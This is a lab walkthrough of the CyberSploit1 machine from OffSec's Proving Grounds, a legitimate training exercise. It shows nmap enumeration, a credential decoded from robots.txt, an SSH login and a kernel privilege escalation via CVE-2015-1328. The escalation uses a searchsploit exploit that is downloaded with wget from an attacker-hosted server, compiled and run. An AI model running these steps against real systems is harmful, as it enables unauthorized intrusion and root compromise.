This is a walkthrough of the machine CyberSploit1 from OffSec's Proving Grounds Play labs.

Machine information:

Nmap

sudo nmap -A --open -sV -sC -v -p- <IP>

‍

Starting off with an Nmap scan, we discover the following open ports:

Webapp

The page does not provide any useful information straight away:

However, looking at the page's source, we discover the username itsskv:

Next, we perform some basic enumeration manually, and discover a base64-encoded string at /robots.txt:

Decoding this string reveals a possible password:

echo "Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0=" | base64 -d

‍

Using the discovered username and decoded password, we can SSH in and obtain the first local.txt flag:

ssh itsskv@<IP>

‍

Checking the kernel version, we discover that it is vulnerable to CVE-2015-1328:

uname -a

‍

‍

searchsploit 3.13.0

‍

‍

searchsploit -m 37292

‍

Taking a look at the PoC, we will need to transfer it from our attack machine to the victim machine, then compile and execute it there:

‍

Firstly, we start up a simple HTTP server to serve the file on our attack box:

python3 -m http.server 80

‍

Next, we fetch the file on the victim machine:

wget http://<ATTACK_BOX_IP>/37292.c

‍

Lastly, we will compile the exploit, assign it correct permissions and execute it to obtain the second proof.txt flag:

gcc 37292.c -o ofs

‍

chmod +x ofs

‍

./ofs

‍